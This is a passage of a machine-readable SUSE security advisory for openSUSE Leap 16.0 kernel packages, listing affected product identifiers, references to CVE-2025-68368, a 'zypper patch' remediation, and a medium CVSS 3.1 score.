"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68368",
"url": "https://www.suse.com/security/cve/CVE-2025-68368"
},
{
"category": "external",
"summary": "SUSE Bug 1255527 for CVE-2025-68368",
"url": "https://bugzilla.suse.com/1255527"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
